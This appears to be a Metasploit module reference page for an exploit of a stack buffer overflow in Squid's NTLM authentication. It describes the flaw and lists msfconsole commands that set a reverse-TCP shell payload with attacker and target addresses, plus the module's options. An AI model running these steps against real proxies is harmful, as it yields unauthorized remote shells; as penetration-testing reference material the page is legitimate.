Squid NTLM Authenticate Overflow
This is an exploit for Squid's NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user-controlled data of a user-defined length. Props to iDEFENSE for the advisory.
Rank
- Great
Authors
- skape < mmiller [at] hick.org >
Exploit Targets
- 0 - Linux Bruteforce (default)
Usage Information
$ msfconsole
msf > use exploit/linux/proxy/squid_ntlm_authenticate
msf exploit(squid_ntlm_authenticate) > show payloads
msf exploit(squid_ntlm_authenticate) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(squid_ntlm_authenticate) > set LHOST [MY IP ADDRESS]
msf exploit(squid_ntlm_authenticate) > set RHOST [TARGET IP]
msf exploit(squid_ntlm_authenticate) > set RPORT [TARGET PORT]
msf exploit(squid_ntlm_authenticate) > exploit
Module Options
| Option | Description |
| --- | --- |
| RHOST | The target address |
| RPORT | The target port |
| BruteStep | Step size between brute force attempts |
| BruteWait | Delay between brute force attempts |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maximum TCP segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
